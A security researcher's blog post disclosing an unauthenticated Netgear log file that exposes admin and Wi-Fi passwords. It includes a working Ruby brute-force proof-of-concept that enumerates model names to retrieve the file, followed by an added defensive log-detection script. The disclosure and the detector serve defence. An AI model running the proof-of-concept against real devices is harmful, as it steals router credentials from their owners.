Adam Caudill

Security Leader, Researcher, Developer, Writer, & Photographer

Netgear Admin Password Disclosure

Some (though not all) Netgear products expose the administrator password to unauthorized users in a file named /cgi-bin/<model>.log – if the device is vulnerable, you’ll get something like this:

>curl http://<ip>/cgi-bin/WNR2000XT.log
Admin login name        admin
Admin password  <snip>
Country Europe
Wireless network name (SSID)    wireless_ext
Wireless channel        6
Security type   WPA2-PSK(AES)
Wireless passphrase     <snip>

The full list of devices that are vulnerable isn’t known; the issue was presented to Netgear, but no response was received. To help identify the vulnerable devices, I pulled a list of all Netgear devices and wrote this script:

#!/usr/bin/env ruby

# Netgear Admin Info Log File Bruteforce PoC
# Copyright 2012 Adam Caudill <adam@adamcaudill.com>
#
# Usage: ruby netgear_adminpass_bt.rb <target-ip>

require 'socket'

PRODUCTS =
["AF711F", "AFM735", "AFT200", "AG711F", "AG711T", "AGM721F", "AGM721T",
"AGM722F", "AGM731F", "AGM732F", "AGM733", "AGM734", "ANT224D10", "ANT2405v1",
"ANT2405v2", "ANT2407", "ANT2409", "ANT2409v1", "ANT2409v2", "ANT24BDC",
"ANT24BNA", "ANT24D18", "ANT24O5", "ANT32405", "APS135W", "APS300W",
"APS525W", "AX741", "AX742", "AX743", "AX744", "AXC761", "AXM751", "AXM752",
"AXM761", "AXM762", "AXM763", "CARP1000", "CG3000", "CG3300D", "CG814M",
"CG814WG", "CGD24G", "CM212", "CMD31T", "CT5B1", "CT5B2", "CT5B6", "CT5W2",
"CT6B1", "CT6B2", "CT6B6", "CVG824G", "DG632", "DG632B", "DG632NA", "DG814",
"DG824M", "DG834B", "DG834Bv2", "DG834Bv3", "DG834Bv4", "DG834GB", "DG834GBv2",
"DG834GNA", "DG834GT", "DG834GUv5", "DG834Gv1", "DG834Gv2", "DG834Gv3",
"DG834Gv4", "DG834Gv5", "DG834GVv1", "DG834GVv2", "DG834Nv1", "DG834Nv2",
"DG834PN", "DG834v1", "DG834v2", "DG834v3", "DG834v4", "DGFV338", "DGN1000",
"DGN2000", "DGN2200", "DGN2200Bv3", "DGN2200M", "DGN2200MB", "DGN2200v1",
"DGN2200v3", "DGN3500", "DGND3300", "DGND3300v1", "DGND3300v2", "DGND3700",
"DGND3700v1", "DGND3700v2", "DGND3800B", "DM111P", "DM111PSPv1", "DM111PSPv2",
"DM111Pv1", "DM111Pv2", "DM602", "DS104", "DS106", "DS108", "DS116", "DS309",
"DS508", "DS516", "DS524", "EA101", "EA201", "EDA4000", "EN104", "EN104TP",
"EN104TPNA", "EN106TP", "EN108", "EN108TP", "EN116", "EN308", "EN308TC",
"EN516", "EN524", "EVA2000", "EVA2200", "EVA5000", "EVA700", "EVA8000",
"EVA9100", "EVA9150", "EVAW111", "FA101", "FA120", "FA310", "FA310TX",
"FA311v1", "FA311v2", "FA312", "FA410", "FA410TX", "FA411", "FA510", "FA511",
"FB105", "FE104", "FE108", "FE116", "FE508", "FE516", "FM114P", "FR114P",
"FR114W", "FR314", "FR318", "FR328S", "FREIGHT", "FS102", "FS104", "FS105",
"FS105NA", "FS105UK", "FS108", "FS108NA", "FS108P", "FS108PNA", "FS116",
"FS116E", "FS116NA", "FS116P", "FS116PNA", "FS205", "FS208", "FS262", "FS305",
"FS308", "FS309T", "FS508", "FS509", "FS509T", "FS510T", "FS516", "FS517TS",
"FS518", "FS518T", "FS524", "FS524S", "FS526T", "FS605NA", "FS605v1",
"FS605v2", "FS605v3", "FS608NA", "FS608v1", "FS608v2", "FS608v3", "FS726",
"FS726AT", "FS726T", "FS726TNA", "FS726TP", "FS726TPNA", "FS728TP",
"FS728TPv1", "FS728TPv2", "FS728TS", "FS750", "FS750AT", "FS750T", "FS750T2",
"FS750T2NA", "FS752TP", "FS752TPS", "FS752TS", "FSM7226RS", "FSM7250RS",
"FSM726", "FSM726E", "FSM726S", "FSM726v1", "FSM726v2", "FSM726v3", "FSM7326P",
"FSM7328PS", "FSM7328S", "FSM7352PS", "FSM7352S", "FSM750S", "FV318",
"FVG318NA", "FVG318v1", "FVG318v2", "FVL328", "FVM318", "FVS114", "FVS124G",
"FVS318G", "FVS318GE", "FVS318N", "FVS318NA", "FVS318v1", "FVS318v2",
"FVS318v3", "FVS328", "FVS336G", "FVS336Gv1", "FVS336Gv2", "FVS338",
"FVS338NA", "FVX538NA", "FVX538v1", "FVX538v2", "FWAG114", "FWG114Pv1",
"FWG114Pv2", "G7328SIP6", "G7352SIP6", "GA302T", "GA311", "GA311NA", "GA511",
"GA620", "GA621", "GA622T", "GC102", "GS104", "GS105", "GS105E", "GS105NA",
"GS108", "GS108E", "GS108Ev1", "GS108Ev2", "GS108NA", "GS108P", "GS108PE",
"GS108PEv1", "GS108PEv2", "GS108T", "GS108Tv1", "GS108Tv2", "GS110T",
"GS110TP", "GS116E", "GS116NA", "GS116v1", "GS116v2", "GS205", "GS208",
"GS308", "GS504", "GS504T", "GS508T", "GS510TP", "GS516T", "GS524T", "GS524TNA",
"GS605", "GS605av", "GS605AV", "GS605NA", "GS608", "GS608AV", "GS608NA",
"GS716T", "GS716TAV", "GS716Tv1", "GS716Tv2", "GS724AT", "GS724T", "GS724TAV",
"GS724TP", "GS724TPS", "GS724TR", "GS724TS", "GS724Tv1", "GS724Tv2", "GS724Tv3",
"GS728TPS", "GS728TS", "GS748AT", "GS748TNA", "GS748TP", "GS748TPS", "GS748TR",
"GS748TS", "GS748Tv1", "GS748Tv2", "GS748Tv3", "GS748Tv4", "GS752TPS",
"GS752TS", "GS752TXS", "GSM5212P", "GSM712", "GSM712F", "GSM7212", "GSM7212F",
"GSM7212P", "GSM7224", "GSM7224P", "GSM7224R", "GSM7224v1", "GSM7224v2",
"GSM7228PL", "GSM7228PS", "GSM7248", "GSM7248R", "GSM7248v1", "GSM7248v2",
"GSM7252PL", "GSM7252PS", "GSM7312", "GSM7324", "GSM7328FL", "GSM7328FS",
"GSM7328S", "GSM7328SO", "GSM7328Sv1", "GSM7328Sv2", "GSM7352S", "GSM7352SO",
"GSM7352Sv1", "GSM7352Sv2", "HA311", "HA501", "HDMG1", "HDMG3", "HDX101",
"HDX111", "HDXB111", "HE102", "HR314", "JDGN1000", "JFS516", "JFS516NA",
"JFS524", "JFS524E", "JFS524F", "JFS524NA", "JGS516", "JGS516NA", "JGS524",
"JGS524E", "JGS524F", "JGS524FNA", "JGS524NA", "JGS524v1", "JGS524v2",
"JGSM7224", "JNR1010", "JNR3000", "JNR3210", "JWNR2000Tv3", "JWNR2000v1",
"JWNR2000v2", "KWGR614", "MA101", "MA111v1", "MA111v2", "MA301", "MA311",
"MA401", "MA521", "MA701", "MBM621", "MBR1200", "MBR1210", "MBR1310",
"MBR624GU", "MBRN3000", "MCA1001v1", "MCA1001v2", "MCAB1001", "ME101", "ME102",
"ME103", "MP101", "MP101REM", "MP115", "MR314", "MR814v1", "MR814v2", "MR814v3",
"MS200", "MS2000", "MS2110", "MS2120", "MVBR1210C", "ND508", "ND520", "NMS100",
"NMS100NA", "NMS200", "NMS2100", "NMS215", "NMS230", "NMS250", "NMS2500",
"NTV200", "NTV200S", "NTV250", "NTV250DU", "NTV340", "NTV350", "NTV550",
"PA101", "PA301", "PE102", "PHS0111", "PHS0112", "PMB0311", "PMB0331NA",
"PMB0332NA", "PMB0333NA", "PMB0334NA", "POE101", "ProLine6100", "PRR0331NA",
"PRR0332", "PRR0333", "PRR0334", "PRR0334E", "PS101v1", "PS101v2", "PS104",
"PS105", "PS110", "PS111W", "PS113", "PS121v1", "PS121v2", "PTV1000", "PTV2000",
"PTVU1000", "R4500", "R6200", "R6300", "RD5200", "RD521210", "RD5D", "RH340",
"RH348", "RM356", "RN00RPL1", "RN00RPL2", "RN00RPL3", "RN12G", "RN12G0620",
"RN12G1220", "RN12P", "RN12P0610", "RN12P0620", "RN12P1210", "RN12P1220",
"RN12P2GE", "RN12PFAN", "RN12PPSU", "RN12PRAIL", "RN12PTRAY", "RN12S",
"RN12S0620", "RN12S1220", "RN12T", "RN12T0620", "RN12T0630", "RN12T1210",
"RN12T1220", "RN12T1230", "RN12T2CX4", "RN12T2SFP", "RND2000", "RND2000v1",
"RND2000v2", "RND2110", "RND2110v1", "RND2110v2", "RND2120", "RND2120v1",
"RND2150", "RND2150v1", "RND2175v1", "RND2210", "RND2210v1", "RND2210v2",
"RND2220", "RND2220v1", "RND4000", "RND4000v1", "RND4000v2", "RND4210",
"RND4210v1", "RND4210v2", "RND4220", "RND4250v1", "RND4410", "RND4410v1",
"RND4410v2", "RND4425v1", "RND4450v1", "RND4FAN1", "RND4M1GB1", "RND4PSU1",
"RND4TRAY1", "RNDP2000", "RNDP200U", "RNDP2210", "RNDP2210D", "RNDP2220",
"RNDP2220D", "RNDP2230", "RNDP2230D", "RNDP4000", "RNDP400U", "RNDP4410",
"RNDP4410D", "RNDP4420", "RNDP4420D", "RNDP4430", "RNDP4430D", "RNDP6000",
"RNDP6000NAS", "RNDP600E", "RNDP600U", "RNDP6310", "RNDP6350", "RNDP6610",
"RNDP6610D", "RNDP6620", "RNDP6620D", "RNDP6630", "RNDP6630D", "RNDTRAY",
"RNDU2000", "RNDU2120", "RNDU2220", "RNDU4000", "RNDU4220", "RNDU6000",
"RNDU6320", "RNDX4000", "RNDX400E", "RNDX4210", "RNDX4250", "RNDX4410",
"RNDX4420", "RNNVR01L", "RNNVR02L", "RNNVR04L", "RNR4000", "RNR4410", "RNR4425",
"RNR4450", "RNR4475", "RNR4FAN1", "RNR4PSU1", "RNR4RL26", "RNR4TRAY1",
"RNR4XCHG", "RNRP4000", "RNRP4410", "RNRP4420", "RNRP4430", "RNRPFAN1",
"RNRPPSU1", "RNRX4000", "RNRX400E", "RNRX4410", "RNRX4410D", "RNRX441E",
"RNRX4420", "RNRX4420D", "RNRX442E", "RNRX4430", "RNRX4430D", "RNRX443E",
"RNRX4450", "RNRXTRAY1", "RNRXXCHG", "RO318", "RP114", "RP334", "RP614NA",
"RP614v1", "RP614v2", "RP614v3", "RP614v4", "RPS5412", "RT311", "RT314",
"RT328", "RT338", "SC101", "SC101T", "SCC", "SPH101", "SPH200D", "SPH200W",
"SRX5308", "SRXN3205", "SSL312", "STM150", "STM150B", "STM150B3", "STM150E",
"STM150E3", "STM150EW", "STM150EW3", "STM150M", "STM150M3", "STM150W",
"STM150W3", "STM300", "STM300B", "STM300B3", "STM300E", "STM300E3", "STM300EW",
"STM300EW3", "STM300M", "STM300M3", "STM300W", "STM300W3", "STM600", "STM600B",
"STM600B3", "STM600E", "STM600E3", "STM600EW", "STM600EW3", "STM600M",
"STM600M3", "STM600W", "STM600W3", "TA612V", "USBG2", "USBG3", "USMG2", "UTM10",
"UTM100", "UTM100B", "UTM100B3", "UTM100E", "UTM100EW", "UTM100EW3", "UTM100M",
"UTM100M3", "UTM100W", "UTM100W3", "UTM10B", "UTM10B3", "UTM10E", "UTM10E3",
"UTM10EW", "UTM10EW3", "UTM10M", "UTM10M3", "UTM10W", "UTM10W3", "UTM150",
"UTM25", "UTM25B", "UTM25B3", "UTM25E", "UTM25E3", "UTM25EW", "UTM25EW3",
"UTM25M", "UTM25M3", "UTM25W", "UTM25W3", "UTM5", "UTM50", "UTM50B", "UTM50B3",
"UTM50E", "UTM50E3", "UTM50EW", "UTM50EW3", "UTM50M", "UTM50M3", "UTM50W",
"UTM50W3", "UTM5B", "UTM5B3", "UTM5E", "UTM5E3", "UTM5EW", "UTM5EW3", "UTM5M",
"UTM5M3", "UTM5W", "UTM5W3", "UTM9S", "VersaLink7500", "VPN01L", "VPN05L",
"VPNG01L", "VPNG05L", "WA301", "WAB102", "WAB501", "WAB502", "WAG102",
"WAG102NA", "WAG302v1", "WAG302v2", "WAG311", "WAG511", "WAG511NA", "WAGL102",
"WC7510L", "WC7520", "WC75NL", "WE102", "WFS709TP", "WG102", "WG102NA", "WG103",
"WG111NA", "WG111T", "WG111U", "WG111US", "WG111v1", "WG111v2", "WG111v3",
"WG121", "WG302NA", "WG302v1", "WG302v2", "WG311NA", "WG311T", "WG311v1",
"WG311v2", "WG311v3", "WG511T", "WG511U", "WG511v1", "WG511v2", "WG602BNA",
"WG602NA", "WG602v1", "WG602v2", "WG602v3", "WG602v4", "WGE101", "WGE101CN",
"WGE111", "WGL102", "WGM124", "WGM511", "WGPS606", "WGPS606NA", "WGR101",
"WGR612", "WGR614L", "WGR614NA", "WGR614v1", "WGR614v10", "WGR614v2",
"WGR614v3", "WGR614v4", "WGR614v5", "WGR614v6", "WGR614v7", "WGR614v8",
"WGR614v9", "WGR826V", "WGT624AU", "WGT624NA", "WGT624SC", "WGT624v1",
"WGT624v2", "WGT624v3", "WGT624v4", "WGT634U", "WGU624", "WGX102v1", "WGX102v2",
"WGXB102", "WIDI1000", "WMS105", "WMS5316", "WN1000RP", "WN111", "WN111v1",
"WN111v2", "WN121T", "WN2000RPT", "WN2000RPTv1", "WN2000RPTv2", "WN2500RP",
"WN3000RP", "WN311B", "WN311T", "WN511B", "WN511T", "WN604", "WN802T",
"WNA1000", "WNA1000M", "WNA1100", "WNA3100", "WNA3100M", "WNAP210", "WNAP320",
"WNB2100", "WNCE2001", "WNCE2004", "WNCE3001", "WNDA3100", "WNDA3100v1",
"WNDA3100v2", "WNDA4100", "WNDAP330", "WNDAP350", "WNDAP360", "WNDAP380R",
"WNDAP620", "WNDR3300", "WNDR3300v1", "WNDR3300v2", "WNDR3400", "WNDR3400v1",
"WNDR3400v2", "WNDR3600v3", "WNDR3700", "WNDR3700v1", "WNDR3700v2",
"WNDR3700v3", "WNDR37AV", "WNDR37AVv1", "WNDR37AVv2", "WNDR3800", "WNDR4000",
"WNDR4500", "WNDRMACv1", "WNDRMACv2", "WNHD3004", "WNHD3004v2", "WNHDE111",
"WNR1000", "WNR1000v1", "WNR1000v2", "WNR1000v3", "WNR1500", "WNR2000",
"WNR2000v1", "WNR2000v2", "WNR2000v3", "WNR2000XT", "WNR2200", "WNR3500",
"WNR3500L", "WNR3500Lv1", "WNR3500Lv2", "WNR3500v1", "WNR3500v2", "WNR500",
"WNR612", "WNR612v2", "WNR612v3", "WNR834Bv1", "WNR834Bv2", "WNR834M",
"WNR854T", "WNXR2000", "WNXR2100", "WPN111", "WPN111RV", "WPN311", "WPN511",
"WPN511RV", "WPN802v1", "WPN802v2", "WPN824EXT", "WPN824N", "WPN824v1",
"WPN824v2", "WPN824v3", "WPNT121", "WPNT511", "WPNT834", "XA601", "XAUB2511",
"XAV1004", "XAV101v1", "XAV101v2", "XAV1101", "XAV1201", "XAV1301v1",
"XAV1301v2", "XAV1501", "XAV1601", "XAV2001", "XAV2101v1", "XAV2101v2",
"XAV2501", "XAV2602", "XAV5001", "XAV5004", "XAV5101", "XAV5201", "XAV5501",
"XAV5601", "XAVB1001", "XAVB1004", "XAVB101", "XAVB1101", "XAVB1201",
"XAVB1301v1", "XAVB1301v2", "XAVB1401", "XAVB1501", "XAVB2001", "XAVB2101v1",
"XAVB2101v2", "XAVB2501", "XAVB2602", "XAVB2602v2", "XAVB5001", "XAVB5004",
"XAVB5101", "XAVB5201", "XAVB5501", "XAVB5601", "XAVB5602", "XAVN2001",
"XAVNB2001", "XAVT5601", "XCM8806", "XCM8810", "XE102v1", "XE102v2", "XE103",
"XE104", "XE104NA", "XE602", "XEB1004", "XEPS103", "XET1001", "XETB1001",
"XETB10GM", "XM128", "XSM7224L", "XSM7224S"]

PORT = 80
host = ARGV[0]

puts "Starting attack, this might take a while..."

begin
  result = nil
  puts "Connecting to #{host}:#{PORT}..."

  PRODUCTS.each_with_index do |product, index|
    puts "Sending request #{index}..." if index % 100 == 0
    sock = TCPSocket.open(host, PORT)
    sock.write("GET /cgi-bin/#{product}.log HTTP/1.1\r\nHost: #{host}\r\n\r\n")

    response = sock.recv(2048)
    sock.close

    if response.inspect.include? "Admin login name"
      result = response
      puts result
      break
    end
  end

  puts "No results found - product/version doesn't seem vulnerable" if result == nil
# Interrupt is a subclass of Exception, so it must be rescued first
rescue ::Interrupt
  abort "\r\nExiting on interrupt"
rescue ::Exception => e
  puts e
  abort
end
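
For defenders, the request pattern above is easy to spot in HTTP logs. The following is an added example, not part of the original post: it flags sources that request many distinct /cgi-bin/<model>.log names, or that receive a 200 for one. The Common Log Format input, the threshold, the function name and the sample lines are all assumptions made for illustration.

```ruby
# Added example (not from the original post): detect probing of
# /cgi-bin/<model>.log in access logs from a proxy or sensor in front of
# the device. Log format (Common Log Format) and threshold are assumptions.
PROBE_PATH = %r{\A/cgi-bin/([A-Za-z0-9]+)\.log\z}
CLF_LINE   = /\A(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) /

# Returns { source_ip => { models: [...], hits: [...] } } for sources that
# requested at least `threshold` distinct model log names (enumeration) or
# got a 200 response for one (the file was likely served).
def find_log_probes(lines, threshold: 3)
  by_src = Hash.new { |h, k| h[k] = { models: [], hits: [] } }
  lines.each do |line|
    m = CLF_LINE.match(line)
    next unless m
    src, _method, target, status = m.captures
    path = target.split("?", 2).first.to_s   # ignore any query string
    model = path[PROBE_PATH, 1]
    next unless model
    entry = by_src[src]
    entry[:models] << model unless entry[:models].include?(model)
    entry[:hits] << model if status == "200"
  end
  by_src.select { |_, e| e[:models].size >= threshold || !e[:hits].empty? }
end

# Constructed sample log lines (documentation-range addresses, made-up times).
SAMPLE_LOG = <<~LOG.lines(chomp: true)
  198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/AF711F.log HTTP/1.1" 404 0
  198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/AFM735.log HTTP/1.1" 404 0
  198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/AFT200.log HTTP/1.1" 404 0
  198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/WNR2000XT.log HTTP/1.1" 200 312
  192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024
  192.0.2.11 - - [01/Jan/2024:10:02:00 +0000] "GET /cgi-bin/WNR2000XT.log HTTP/1.1" 401 0
  203.0.113.5 - - [01/Jan/2024:10:03:00 +0000] "GET /cgi-bin/WNR2000XT.log?x=1 HTTP/1.1" 200 310
LOG

if __FILE__ == $PROGRAM_NAME
  find_log_probes(SAMPLE_LOG).each do |src, e|
    kind = e[:hits].empty? ? "enumeration" : "file served for #{e[:hits].join(', ')}"
    puts "#{src}: #{e[:models].size} model log name(s) requested (#{kind})"
  end
end
```

Any source reported with a non-empty `hits` list should be treated as having read the admin password and wireless passphrase, so both need to be changed on that device.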
